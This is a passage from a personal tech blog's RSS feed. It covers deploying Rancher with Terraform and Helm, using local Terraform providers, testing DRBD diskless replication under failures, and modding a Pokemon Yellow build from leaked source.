    certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0F....</code></pre><figcaption>Extracting using JSON</figcaption></figure><p>We can automate it away using the <code>local_sensitive_file</code> resource of Terraform provider <a href="https://registry.terraform.io/providers/hashicorp/local/latest/docs/resources/file">hashicorp/local</a>. Add the following to <code>rke.tf</code>:</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">resource &quot;local_sensitive_file&quot; &quot;kube_config_yaml&quot; {
  content = rke_cluster.cluster_local.kube_config_yaml
  filename = &quot;kubeconfig.yaml&quot;
}</code></pre><figcaption>local_sensitive_file</figcaption></figure><p>And update the <code>main.tf</code> with the new provider used:</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">terraform {
  required_providers {
...
    local = {
      source = &quot;hashicorp/local&quot;
      version = &quot;2.2.2&quot;
    }
  }
}</code></pre><figcaption>main.tf Adding the local provider</figcaption></figure><p><em>Don&apos;t forget to run terraform init!</em></p><p>Running <code>terraform apply</code> writes the <code>kubeconfig.yaml</code> to the local filesystem. You can now talk to the RKE cluster.</p><pre><code class="language-shell-session">marco@DESKTOP-WS:~/tests$ export KUBECONFIG=kubeconfig.yaml
marco@DESKTOP-WS:~/tests$ kubectl get nodes
NAME            STATUS   ROLES                      AGE   VERSION
5.6.7.8   Ready    controlplane,etcd,worker   23m   v1.21.7</code></pre><h2 id="installing-rancher">Installing Rancher</h2><p>Finally, we&apos;re ready to install Rancher after all the writing and five iterations of the RKE machine later. To do this, we&apos;ll be using the <a href="https://registry.terraform.io/providers/hashicorp/helm/latest">hashicorp/helm</a> and <a href="https://registry.terraform.io/providers/rancher/rancher2/latest/docs">rancher/rancher2</a> providers.</p><p>Add the providers to <code>main.tf</code>. Also, define the location of the <code>kubeconfig.yaml</code></p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">terraform {
  required_providers {
...
    rancher2 = {
      source = &quot;rancher/rancher2&quot;
      version = &quot;1.22.2&quot;
    }
    helm = {
      source = &quot;hashicorp/helm&quot;
      version = &quot;2.4.1&quot;
    }
  }
}

provider &quot;helm&quot; {
  kubernetes {
    config_path = &quot;kubeconfig.yaml&quot;
  }
}</code></pre><figcaption>Adding helm config to main.tf</figcaption></figure><p>Add ports 80 and 443 to <code>securitygroups.tf</code>, else you won&apos;t be able to access the cluster and Terraform can&apos;t bootstrap it.</p><p>Certmanager will be a dependency of Rancher, so create a new file called <code>certmanager.tf</code> :</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">resource &quot;helm_release&quot; &quot;cert_manager&quot; {
  name             = &quot;cert-manager&quot;
  namespace        = &quot;cert-manager&quot;
  repository       = &quot;https://charts.jetstack.io&quot;
  chart            = &quot;cert-manager&quot;
  version          = &quot;1.5.3&quot;

  wait             = true
  create_namespace = true
  force_update     = true
  replace          = true

  set {
    name  = &quot;installCRDs&quot;
    value = true
  }
}
</code></pre><figcaption>Adding helm install to certmanager.tf</figcaption></figure><p>You can use <code>set</code> to override values like you would in a <code>values.yaml</code></p><p>Next, create a file called <code>rancher.tf</code> :</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">resource &quot;helm_release&quot; &quot;rancher&quot; {
  name = &quot;rancher&quot;
  namespace = &quot;cattle-system&quot;
  chart = &quot;rancher&quot;
  repository = &quot;https://releases.rancher.com/server-charts/latest&quot;
  depends_on = [helm_release.cert_manager]

  wait             = true
  create_namespace = true
  force_update     = true
  replace          = true

  set {
    name  = &quot;hostname&quot;
    value = &quot;rancher.debugdomain.com&quot;
  }

  set {
    name  = &quot;ingress.tls.source&quot;
    value = &quot;rancher&quot;
  }
  
  set {
    name  = &quot;bootstrapPassword&quot;
    value = &quot;A-Random-Password&quot;
  }

  set {
    name  = &quot;rancherImageTag&quot;
    value = &quot;v2.6.3-patch1&quot;
  }
}

provider &quot;rancher2&quot; {
  alias = &quot;bootstrap&quot;

  api_url   = &quot;https://rancher.debugdomain.com&quot;
  insecure  = true
  bootstrap = true
}

# Create a new rancher2_bootstrap using bootstrap provider config
resource &quot;rancher2_bootstrap&quot; &quot;admin&quot; {
  provider = rancher2.bootstrap
  depends_on = [helm_release.rancher]
  initial_password = &quot;A-Random-Password&quot;
  # New password will be generated and saved in statefile
  telemetry = false
}

# Provider config for admin
provider &quot;rancher2&quot; {
  alias = &quot;admin&quot;

  api_url = rancher2_bootstrap.admin.url
  token_key = rancher2_bootstrap.admin.token
  insecure = true
}
</code></pre><figcaption>All Rancher.tf config</figcaption></figure><p>The <code>rancher.tf</code> is one of the big terraform files. Here we&apos;ll use the <a href="https://registry.terraform.io/providers/rancher/rancher2/latest/docs">Rancher provider</a>. Here we define:</p><ul><li>The Helm installation of Rancher</li><li>Where the Rancher cluster will be</li><li>A bootstrap provider for Rancher</li><li>An admin provider for Rancher</li></ul><p>If you have set up the security groups open wide, you should choose a unique, strong password for the initial Rancher Helm deployment.</p><p>We override the Rancher version to get the latest patches, as this is not the default.</p><p>Using the alias attribute, we can make multiple providers. This way, we separate admin from bootstrap.</p><p>Once we run <code>terraform apply</code>, we&apos;ll see the Rancher server creating.</p><p>We can access the generated password by running:</p><figure class="kg-card kg-code-card"><pre><code class="language-bash">terraform show -json \
  | jq &apos;.values[&quot;root_module&quot;][&quot;resources&quot;][] \
  | select(.address == &quot;rancher2_bootstrap.admin&quot;) | .values.password&apos; -r</code></pre><figcaption>Using JSON to extract password</figcaption></figure><p>But we can also ask Terraform to write it down:</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">resource &quot;local_sensitive_file&quot; &quot;rancher-password&quot; {
  content = rancher2_bootstrap.admin.password
  filename = &quot;rancher_password&quot;
}</code></pre><figcaption>Write password to sensitive file</figcaption></figure><h2 id="unforeseen-dependency-problems">Unforeseen dependency problems</h2><p>To test this script, we can now run <code>terraform destroy</code> and <code>terraform apply</code>. It will immediately tell you that <code>kubeconfig.yaml</code> does not exist. The missing file happens due to Terraform not having initialized the cluster yet. Expanding your Terraform module step by step can cause unwanted dependency orders. Helm needs the kubeconfig file, while it&apos;s only created after the Helm provider is initialized. There is a lot more on this subject written in this <a href="https://github.com/hashicorp/terraform/issues/2430">GitHub issue</a>.</p><p>To fix this problem, I&apos;ve moved a lot of things around. I made three directories:</p><ul><li>Cloud</li><li>RKE</li><li>Rancher</li></ul><p>I&apos;ve moved everything CloudStack related to Cloud and so forth.</p><figure class="kg-card kg-code-card"><pre><code class="language-text">.
&#x251C;&#x2500;&#x2500; cloud
&#x2502;   &#x251C;&#x2500;&#x2500; instances.tf
&#x2502;   &#x251C;&#x2500;&#x2500; main.tf
&#x2502;   &#x2514;&#x2500;&#x2500; security_groups.tf
&#x251C;&#x2500;&#x2500; rancher
&#x2502;   &#x251C;&#x2500;&#x2500; certmanager.tf
&#x2502;   &#x251C;&#x2500;&#x2500; main.tf
&#x2502;   &#x2514;&#x2500;&#x2500; rancher.tf
&#x251C;&#x2500;&#x2500; rke
&#x2502;   &#x251C;&#x2500;&#x2500; main.tf
&#x2502;   &#x251C;&#x2500;&#x2500; rke.tf
&#x2502;   &#x2514;&#x2500;&#x2500; rke_debug.log
&#x251C;&#x2500;&#x2500; test_rsa
&#x2514;&#x2500;&#x2500; test_rsa.pub</code></pre><figcaption>Directory tree</figcaption></figure><h2 id="breaking-apart-the-monolith">Breaking apart the monolith</h2><p>Having everything in one Terraform configuration causes dependency troubles. Besides that, you can&apos;t split privileges to a certain level of your infrastructure that way. Some people could manage CloudStack, some RKE and Rancher. Breaking the config into small pieces that only do what they&apos;re supposed to will create more flexibility. It looks a lot cleaner too.</p><h3 id="cloud">Cloud</h3><p>I&apos;ve changed the <code>main.tf</code> and moved the RKE and Rancher provider stuff to the <code>main.tf</code> of those respective directories. Another change is having Cloud write an output after each run to export the IP address to the others.</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">output &quot;ip_address&quot; {
  value = cloudstack_instance.test.ip_address
}</code></pre><figcaption>Output info of Terraform run and save in terraform.state</figcaption></figure><p>I&apos;ve also changed all pointers to <code>test_rsa</code> to point to <code>../test_rsa</code>.</p><h3 id="rke">RKE</h3><p>RKE now has to know what Cloud&apos;s data output was. To do this, we&apos;ve got to add this small config to the <code>main.tf</code> of RKE and make it aware of Cloud&apos;s data.</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">data &quot;terraform_remote_state&quot; &quot;cloud&quot; {
  backend = &quot;local&quot; 
  config = {
    path    = &quot;../cloud/terraform.tfstate&quot;
  }
}</code></pre><figcaption>Read output data from remote terraform.state</figcaption></figure><p>Change the <code>cloudstack_instance.test.ip_address</code> to <code>data.terraform_remote_state.cloud.outputs.ip_address</code> in <code>rke.tf</code>.</p><p>Change the <code>test_rsa</code> path to <code>../test_rsa</code>. You should do the same with the pub file.</p><h3 id="rancher">Rancher</h3><p>The only change needed here is to point to the correct location of <code>kubeconfig.yaml</code> which is <code>../rke/kubeconfig.yaml</code>.</p><h2 id="testing-it-again">Testing it again</h2><p>To test the complete module, we should enter the cloud directory first. Apply and move on to the next directory, RKE. Once RKE is set up, move to the Rancher directory and apply again. &#xA0;</p><h2 id="conclusion">Conclusion</h2><p>With the installation of Rancher, we&apos;ve come to the end of this blog post. The following blog post will be about provisioning multiple servers config efficiently and growing the Rancher instance. We&apos;ll also add an extra cluster to the Rancher instance.</p>]]></content:encoded></item><item><title><![CDATA[Using custom providers in Terraform]]></title><description><![CDATA[<p>The <a href="https://github.com/rancher/terraform-provider-rke">RKE provider</a> that I&apos;d like to use is some versions behind. It seemed easy enough to update the dependency, but I struggled to get this custom RKE provider working without having to upload it somewhere. The documentation didn&apos;t seem to be obvious enough. After searching</p>]]></description><link>https://fe.ax/custom-terraform-providers/</link><guid isPermaLink="false">62aa367b094121017a6b401a</guid><category><![CDATA[shorts]]></category><category><![CDATA[Terraform]]></category><dc:creator><![CDATA[marco]]></dc:creator><pubDate>Fri, 18 Mar 2022 07:10:39 GMT</pubDate><content:encoded><![CDATA[<p>The <a href="https://github.com/rancher/terraform-provider-rke">RKE provider</a> that I&apos;d like to use is some versions behind. It seemed easy enough to update the dependency, but I struggled to get this custom RKE provider working without having to upload it somewhere. The documentation didn&apos;t seem to be obvious enough. After searching on Google, I found <a href="https://github.com/hashicorp/terraform-website/issues/1513">this issue on GitHub</a>, which made it clear.</p><p>For me, the example meant:</p><figure class="kg-card kg-code-card"><pre><code class="language-terraform"># main.tf

terraform {
  required_providers {
    rke = {
      source = &quot;my.local/marco/rke&quot;
      version = &quot;1.3.1&quot;
    }
  }
}</code></pre><figcaption>Terraform providers</figcaption></figure><figure class="kg-card kg-code-card"><pre><code class="language-shell">~/.terraform.d/plugins/my.local/marco/rke/1.3.1/linux_amd64/terraform-provider-rke_v1.3.1</code></pre><figcaption>Directory structure from home</figcaption></figure>]]></content:encoded></item><item><title><![CDATA[Reliability DRBD]]></title><description><![CDATA[How reliable is DRBD in diskless mode? Let's find out by trying.]]></description><link>https://fe.ax/reliability-drbd/</link><guid isPermaLink="false">62aa367b094121017a6b4018</guid><category><![CDATA[DRBD]]></category><dc:creator><![CDATA[marco]]></dc:creator><pubDate>Mon, 28 Feb 2022 15:05:51 GMT</pubDate><content:encoded><![CDATA[<p>In my last post, I showed that DRBD could be used diskless, which effectively does the same as exposing a disk with iSCSI. However, DRBD can do more than just become an iSCSI target, and its most known feature is replicating disks over a network.</p><p>This post will look into mounting a DRBD device diskless and testing its reliability when one of the two backing nodes fails and more.</p><!--kg-card-begin: markdown--><p>I started by mounting the DRBD disk on node 3, the diskless node. If you run <code>drbdadm status</code> it should show the following:</p>
<!--kg-card-end: markdown--><figure class="kg-card kg-code-card"><pre><code class="language-shell-session">root@drbd1:~# drbdadm status
test-disk role:Secondary
  disk:UpToDate
  drbd2 role:Secondary
    peer-disk:UpToDate
  drbd3 role:Primary
    peer-disk:Diskless</code></pre><figcaption>drbdadm status</figcaption></figure><!--kg-card-begin: markdown--><p>After it&apos;s mounted, I&apos;ve created a small test file and installed <code>pv</code>. I started writing the test file slowly to the disk. For now, we don&apos;t want to overload the disk or fill it up too quickly to perform reliability tests.</p>
<!--kg-card-end: markdown--><p>I gave node one a shutdown command to test the reliability under normal circumstances. After it came back, I gave node two a shutdown command.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell-session"># Diskless DRBD node 3

root@drbd3:~# dd if=/dev/urandom bs=1M count=1 &gt; /testfile
root@drbd3:~# cat /testfile | pv -L 40000 -r -p -e -s 1M &gt; /mnt/testfile
[39.3KiB/s] [=====&gt;                          ] 11% ETA 0:00:23

# DRBD node 1

root@drbd1:~# reboot
Connection to 192.168.178.199 closed by remote host.
Connection to 192.168.178.199 closed.

# DRBD node 2

root@drbd2:~# drbdadm status
test-disk role:Secondary
  disk:UpToDate
  drbd1 connection:Connecting
  drbd3 role:Primary
    peer-disk:Diskless

# DRBD node 1

root@drbd1:~# drbdadm adjust all
Marked additional 4096 KB as out-of-sync based on AL.
root@drbd1:~# drbdadm status
test-disk role:Secondary
  disk:UpToDate
  drbd2 role:Secondary
    peer-disk:UpToDate
  drbd3 role:Primary
    peer-disk:Diskless

# Diskless DRBD node 3

root@drbd3:~# md5sum /testfile &amp;&amp; md5sum /mnt/testfile
553118a49cea22b739c2cf43fa53ae86  /testfile
553118a49cea22b739c2cf43fa53ae86  /mnt/testfile</code></pre><figcaption>Testing reliability with graceful reboots</figcaption></figure><p>During the reboot of DRBD node one, the writes on DRBD node three were halted shortly but came back very soon after.</p><p>When applying more pressure on the disks using a 3GB test file and unlimited speed, the disk of the rebooted server became inconsistent and needed a resync.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell-session">root@drbd2:~# reboot
Connection to 192.168.178.103 closed by remote host.
Connection to 192.168.178.103 closed.
root@DESKTOP-2RFLM66:~# ssh 192.168.178.103
root@drbd2:~# drbdadm status
# No currently configured DRBD found.
root@drbd2:~# drbdadm adjust all
root@drbd2:~# drbdadm status
test-disk role:Secondary
  disk:Inconsistent
  drbd1 role:Secondary
    replication:SyncTarget peer-disk:UpToDate done:7.28
  drbd3 role:Primary
    peer-disk:Diskless resync-suspended:dependency
    
# Diskless DRBD node 3

root@drbd3:~# md5sum /testfile &amp;&amp; md5sum /mnt/testfile
d67f12594b8f29c77fc37a1d81f6f981  /testfile
d67f12594b8f29c77fc37a1d81f6f981  /mnt/testfile
root@drbd3:~# md5sum /testfile &amp;&amp; md5sum /mnt/testfile
d67f12594b8f29c77fc37a1d81f6f981  /testfile
d67f12594b8f29c77fc37a1d81f6f981  /mnt/testfile
root@drbd3:~# md5sum /testfile &amp;&amp; md5sum /mnt/testfile
d67f12594b8f29c77fc37a1d81f6f981  /testfile
d67f12594b8f29c77fc37a1d81f6f981  /mnt/testfile</code></pre><figcaption>Same test but with 3GB file at 500MBps write speed.</figcaption></figure><p>So DRBD seems to be very stable when the servers are rebooted gracefully. But what happens if we reboot them both?</p><figure class="kg-card kg-code-card"><pre><code class="language-shell-session">root@drbd3:~# cat /testfile | pv -r -p -e -s 3000M &gt; /mnt/testfile; md5sum /testfile &amp;&amp; md5sum /mnt/testfile
[3.67MiB/s] [=======================================&gt;                                                                         ] 36% ETA 0:00:22
pv: write failed: Read-only file system

Message from syslogd@drbd3 at Feb 28 13:50:38 ...
 kernel:[ 4498.824570] EXT4-fs (drbd1): failed to convert unwritten extents to written extents -- potential data loss!  (inode 12, error -30)

Message from syslogd@drbd3 at Feb 28 13:50:38 ...
 kernel:[ 4498.825393] EXT4-fs (drbd1): failed to convert unwritten extents to written extents -- potential data loss!  (inode 12, error -30)

Message from syslogd@drbd3 at Feb 28 13:50:38 ...
 kernel:[ 4498.826171] EXT4-fs (drbd1): failed to convert unwritten extents to written extents -- potential data loss!  (inode 12, error -30)

Message from syslogd@drbd3 at Feb 28 13:50:38 ...
 kernel:[ 4498.826876] EXT4-fs (drbd1): failed to convert unwritten extents to written extents -- potential data loss!  (inode 12, error -30)

Message from syslogd@drbd3 at Feb 28 13:50:38 ...
 kernel:[ 4498.827601] EXT4-fs (drbd1): failed to convert unwritten extents to written extents -- potential data loss!  (inode 12, error -30)

Message from syslogd@drbd3 at Feb 28 13:50:38 ...
 kernel:[ 4498.828365] EXT4-fs (drbd1): failed to convert unwritten extents to written extents -- potential data loss!  (inode 12, error -30)

Message from syslogd@drbd3 at Feb 28 13:50:38 ...
 kernel:[ 4498.829102] EXT4-fs (drbd1): failed to convert unwritten extents to written extents -- potential data loss!  (inode 12, error -30)
d67f12594b8f29c77fc37a1d81f6f981  /testfile
md5sum: /mnt/testfile: Input/output error
root@drbd3:~# md5sum /testfile &amp;&amp; md5sum /mnt/testfile
d67f12594b8f29c77fc37a1d81f6f981  /testfile
2f80ddfb7fe21b9294b2e3663c0a0644  /mnt/testfile
root@drbd3:~# mount | grep mnt
/dev/drbd1 on /mnt type ext4 (ro,relatime)</code></pre><figcaption>Testing both persistent disk reboots at the same time</figcaption></figure><p>It doesn&apos;t like that. But the disk seems to be OK to the point where it could write. Of course, you don&apos;t want this to happen, but at least the disks are still mountable and readable.</p><h2 id="what-if-the-network-starts-flapping">What if the network starts flapping?</h2><figure class="kg-card kg-code-card"><pre><code class="language-shell-session">root@drbd1:~# drbdadm status
test-disk role:Secondary
  disk:UpToDate
  drbd2 role:Secondary
    peer-disk:UpToDate
  drbd3 role:Primary
    peer-disk:Diskless

... Connectivity failure due to tagging VM with wrong VLAN in Hyper-V

... Restoring VLAN settings

root@drbd1:~# drbdadm status
test-disk role:Secondary
  disk:UpToDate
  drbd2 connection:Connecting
  drbd3 connection:Connecting

root@drbd1:~# drbdadm status
test-disk role:Secondary
  disk:Inconsistent
  drbd2 role:Secondary
    replication:SyncTarget peer-disk:UpToDate done:5.39
  drbd3 role:Primary
    peer-disk:Diskless resync-suspended:dependency</code></pre><figcaption>Interrupting network connectivity</figcaption></figure><p>Writing to the disk was just as fast as writing when both were available.</p><h2 id="what-if-we-have-a-broken-network-connection-that-allows-10mbps">What if we have a broken network connection that allows 10Mbps?</h2><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://fe.ax/content/images/2022/02/image-1.png" class="kg-image" alt loading="lazy" width="690" height="131" srcset="https://fe.ax/content/images/size/w600/2022/02/image-1.png 600w, https://fe.ax/content/images/2022/02/image-1.png 690w"><figcaption>Normal speed</figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://fe.ax/content/images/2022/02/image-2.png" class="kg-image" alt loading="lazy" width="442" height="179"><figcaption>Hyper-V setting</figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://fe.ax/content/images/2022/02/image-3.png" class="kg-image" alt loading="lazy" width="690" height="104" srcset="https://fe.ax/content/images/size/w600/2022/02/image-3.png 600w, https://fe.ax/content/images/2022/02/image-3.png 690w"><figcaption>New speed</figcaption></figure><p>However, this only seems to work on outgoing traffic, not incoming traffic. While reading from the disk, both nodes are limited at 10Mbps if one of them is.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://fe.ax/content/images/2022/02/image-4.png" class="kg-image" alt loading="lazy" width="690" height="208" srcset="https://fe.ax/content/images/size/w600/2022/02/image-4.png 600w, https://fe.ax/content/images/2022/02/image-4.png 690w"><figcaption>Above DRBD node 1, limited at 10Mbps. Below DRBD node 2, unlimited</figcaption></figure><p>When setting the DRBD &quot;test-disk&quot; down on node 1, the speed of node 2 became unlimited again.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://fe.ax/content/images/2022/02/image-6.png" class="kg-image" alt loading="lazy" width="691" height="81" srcset="https://fe.ax/content/images/size/w600/2022/02/image-6.png 600w, https://fe.ax/content/images/2022/02/image-6.png 691w"><figcaption>After &quot;drbdadm down test-disk.&quot;</figcaption></figure><p>Interesting to see it balances the reads on both nodes.</p><h2 id="what-if-a-node-gets-panicked-during-writes">What if a node gets panicked during writes?</h2><p>Let&apos;s reset DRBD node two while writing at full speed.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell-session">root@drbd2:~# packet_write_wait: Connection to 192.168.178.103 port 22: Broken pipe
root@DESKTOP-2RFLM66:~# ssh 192.168.178.103
Last login: Mon Feb 28 14:32:18 2022 from 192.168.178.47
root@drbd2:~# drbdadm status
# No currently configured DRBD found.
root@drbd2:~# drbdadm adjust all
Marked additional 4948 MB as out-of-sync based on AL.
root@drbd2:~# drbdadm status
test-disk role:Secondary
  disk:Inconsistent
  drbd1 role:Secondary
    replication:SyncTarget peer-disk:UpToDate done:0.21
  drbd3 role:Primary
    peer-disk:Diskless resync-suspended:dependency</code></pre><figcaption>Reset node two</figcaption></figure><p>Besides a short hiccup, we don&apos;t notice anything after DRBD declares node two unavailable.</p><h2 id="conclusion">Conclusion</h2><p>DRBD has shown to be very stable. Rebooting or resetting DRBD nodes will result in a short hiccup but will continue to work just fine. I couldn&apos;t yet figure out why limiting one node its network bandwidth results in both nodes being limited in read-speed, and I&apos;d like to see that being balanced based on the congestion of the network. In the next DRBD post, I hope to look at LINSTOR.</p>]]></content:encoded></item><item><title><![CDATA[Diskless DRBD]]></title><description><![CDATA[Exploring DRBD's diskless mode for the fastest, most flexible way to run RAID1 over the network.]]></description><link>https://fe.ax/diskless-drbd/</link><guid isPermaLink="false">62aa367b094121017a6b4017</guid><category><![CDATA[DRBD]]></category><dc:creator><![CDATA[marco]]></dc:creator><pubDate>Wed, 23 Feb 2022 22:40:58 GMT</pubDate><content:encoded><![CDATA[<p>I&apos;ve been using DRBD for quite some time now. When I started as a Linux system administrator at my first real job, DRBD was this RAID1 high available storage thing that was magic to me. In combination with PiranHA, which retired ten years ago, I built a setup I demonstrated to my colleague as a high availability setup.</p><p>Although this was ten years ago, the people at LINBIT haven&apos;t been sitting still. DRBD 9 came to life in 2015, but I had never had any experience with its new features other than &quot;Just using it&quot;. When I started looking into Kubernetes, I started looking deeper in DRBD.</p><p>If you&apos;ve used DRBD 9, you probably know it can, contrary to DRBD 8, &#xA0;replicate to more than two nodes. Replication means you can use DRBD in a cluster of 3 nodes and not decide which two nodes can run which workload. The downside of this is the increased disk usage, and an even more significant problem is the scalability and flexibility problems when you&apos;re reaching ten or even 100 nodes. You&apos;re not going to replicate all the data over all the 100 nodes.</p><p>Flexibility is where diskless DRBD comes in. Once you&apos;ve installed DRBD on every node of your cluster, your disks aren&apos;t bound to the metal casing they reside in. You can expose a single disk on one node to another without replicating the data. Let&apos;s dive into the technical stuff now!</p><p>Installing virtual machines is manually boring. Use Hyper-V on your Windows workstation to quickly get some virtual machines up and running. Soon I&apos;ll talk about doing the same thing with Terraform on AWS, Azure and GCP!</p><figure class="kg-card kg-image-card kg-width-wide kg-card-hascaption"><img src="https://fe.ax/content/images/2022/02/2022-02-23_21-33-47.gif" class="kg-image" alt loading="lazy" width="1026" height="872" srcset="https://fe.ax/content/images/size/w600/2022/02/2022-02-23_21-33-47.gif 600w, https://fe.ax/content/images/size/w1000/2022/02/2022-02-23_21-33-47.gif 1000w, https://fe.ax/content/images/2022/02/2022-02-23_21-33-47.gif 1026w"><figcaption>Manual labour! :(</figcaption></figure><p>So I&apos;ve set up three virtual machines with ubuntu 20.04. I did the first things first. I placed my keys on the server and updated them to the latest packages. Make a snapshot; it saves you time.</p><p>Something I wanted to do differently in this blog is compiling DRBD myself. Usually, I would use the LINBIT PPA repo, and of course, you can do so. However, time will pass, this post gets old, versions change, and its accuracy will rot.</p><p>Let&apos;s prepare the servers for DRBD! The commands used to compile are so simple.</p><figure class="kg-card kg-code-card"><pre><code class="language-bash"># DRBD Kernel Module

sudo apt install build-essential flex
wget https://pkg.linbit.com/downloads/drbd/9/drbd-9.2.0-rc.4.tar.gz
tar zxvf drbd-9.2.0-rc.4.tar.gz
cd drbd-9.2.0-rc.4/
make -j 8
sudo make install
cd - # return to previous directory

# DRBD Utils

wget https://pkg.linbit.com/downloads/drbd/utils/drbd-utils-9.20.2.tar.gz
tar zxvf drbd-utils-9.20.2.tar.gz
cd drbd-utils-9.20.2
./configure --with-manual=no --with-pacemaker=no --with-xen=no --without-83support --without-84support --with-heartbeat=no --prefix=/opt/drbd
make -j 8
sudo make install

# Copy multipathd file to prevent it from locking the drbd disk once it&apos;s open

mkdir /etc/multipath/conf.d
cp /opt/drbd/etc/multipath/conf.d/drbd.conf /etc/multipath/conf.d/drbd.conf
systemctl restart multipathd

# Verify it&apos;s working

sudo modprobe drbd
cat /proc/drbd

# version: 9.2.0-rc.4 (api:2/proto:110-121)
# GIT-hash: 5828124e330af6238cec2bf396145b4e04487c5f build by feax@drdb1, 2022-02-22 20:55:11
# Transports (api:18): tcp (9.2.0-rc.4)
</code></pre><figcaption>Compiling the DRBD tools</figcaption></figure><p>Do this on all three nodes. DRBD should be running, but nothing to be created yet. First, let&apos;s create two persistent disks. You can do diskless with even a single node, but let&apos;s test the availability if one of them fails in the next blog post.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell-session">feax@drbd1:~$ sudo lvcreate -L 5G -n test-disk ubuntu-vg
[sudo] password for feax:
  Logical volume &quot;test-disk&quot; created.</code></pre><figcaption>Creating LV device</figcaption></figure><p>Create a DRBD resource file on all three nodes.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell-session">root@drbd1:/opt/drbd/etc/drbd.d# cat test-disk.res
resource test-disk {
  device      minor 1;
  disk        /dev/ubuntu-vg/test-disk;
  meta-disk   internal;

  on drbd1 {
    address   192.168.178.199:7100;
    node-id   1;
  }
  on drbd2 {
    address   192.168.178.103:7100;
    node-id   2;
  }
  on drbd3 {
    disk      none;
    address   192.168.178.119:7100;
    node-id   3;
  }

  connection-mesh {
        hosts drbd1 drbd2 drbd3;
  }
}</code></pre><figcaption>DRBD resource config</figcaption></figure><p>Prepare the persistent disks on both nodes with disks.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell-session">feax@drbd1:~$ sudo drbdadm create-md test-disk
  --==  Thank you for participating in the global usage survey  ==--
The server&apos;s response is:
    you are the 17th user to install this version
initializing activity log
initializing bitmap (160 KB) to all zero
Writing meta data...
New drbd meta data block successfully created.
success
feax@drbd1:~$ sudo drbdsetup new-current-uuid --clear-bitmap test-disk
</code></pre><figcaption>Prepare DRBD disks</figcaption></figure><p>Adjust the DRBD resources on all nodes and check their status.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell-session">feax@drbd1:~$ sudo drbdadm status
test-disk role:Secondary
  disk:UpToDate
  drbd2 role:Secondary
    replication:SyncSource peer-disk:Inconsistent done:14.59
  drbd3 role:Secondary
    peer-disk:Diskless</code></pre><figcaption>DRBD status after set up</figcaption></figure><p>You&apos;ll see that one node says Secondary/Diskless. Let&apos;s make this disk primary, create a filesystem and mount it.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell-session">feax@drbd3:~$ sudo drbdadm primary test-disk
feax@drbd3:~$ sudo drbdadm status
test-disk role:Primary
  disk:Diskless
  drbd1 role:Secondary
    peer-disk:UpToDate
  drbd2 role:Secondary
    peer-disk:UpToDate
feax@drbd3:~$ sudo drbdadm primary test-disk
feax@drbd3:~$ sudo mkfs.ext4 /dev/drbd1
mke2fs 1.45.5 (07-Jan-2020)
Discarding device blocks: done
Creating filesystem with 1310671 4k blocks and 327680 inodes
Filesystem UUID: ece9ddae-a57c-498e-bccf-251adecf85d2
Superblock backups stored on blocks:
        32768, 98304, 163840, 229376, 294912, 819200, 884736

Allocating group tables: done
Writing inode tables: done
Creating journal (16384 blocks): done
Writing superblocks and filesystem accounting information: done

feax@drbd3:~$ sudo mount /dev/drbd/by-res/test-disk/0 /mnt
feax@drbd3:~$ ls /mnt
lost+found</code></pre><figcaption>Preparing a filesystem</figcaption></figure><p>Now we can write files to this filesystem without having the disk available here. Let&apos;s dive into the reliability of node failures in the next blog post.</p>]]></content:encoded></item><item><title><![CDATA[Hacking friends in Pokemon Yellow]]></title><description><![CDATA[<p>Some months ago, the source code of a game I and many others played as a kid was leaked. The game is written in assembly, and people have already reverse-engineered the original game. Still, I was very curious about the original comments in these source files. </p><p>After reading some source</p>]]></description><link>https://fe.ax/pokemon-hacking/</link><guid isPermaLink="false">62aa367b094121017a6b4015</guid><dc:creator><![CDATA[marco]]></dc:creator><pubDate>Sun, 20 Feb 2022 22:30:42 GMT</pubDate><content:encoded><![CDATA[<p>Some months ago, the source code of a game I and many others played as a kid was leaked. The game is written in assembly, and people have already reverse-engineered the original game. Still, I was very curious about the original comments in these source files. </p><p>After reading some source files, I started figuring out how to compile it. Luckily, people online have already figured it out and posted this online. After compiling and verifying it ran in an emulator, I decided it was time to edit some assembly to allow changes I wished I always had.</p><p>One of the things I never liked while replaying the game was how the messages appeared on the screen. The typewriter-style animation takes too much time to show, even when setting it to &quot;fast&quot;.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://fe.ax/content/images/2022/02/2020-06-07_19-37-34.gif" class="kg-image" alt loading="lazy" width="483" height="403"><figcaption>&quot;Fast&quot; typewriter-style message</figcaption></figure><p>I&apos;ve edited the delay out. A simple change, but nice to have. </p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://fe.ax/content/images/2022/02/2020-06-07_19-41-36.gif" class="kg-image" alt loading="lazy" width="482" height="401"><figcaption>Non-typewriter-style message</figcaption></figure><p>Another thing that bugged me had always been the extreme amount of wild pokemon that appear. So I programmed an extra menu option to activate a max repel on demand. </p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://fe.ax/content/images/2022/02/2020-06-07_21-39-20.gif" class="kg-image" alt loading="lazy" width="553" height="404"><figcaption>Repel changing in menu showing the memory table in the back</figcaption></figure><p>Sadly, I don&apos;t have the changed code anymore. I have the compiled binary, which should be reversely engineerable, but it wouldn&apos;t be worth the time.</p><p>Another fantastic journey was adding friends to the game. Replacing Pok&#xE9;mon was something I couldn&apos;t figure out online. The editing of the strings was the easy part, but adding the images took it to a whole other level. 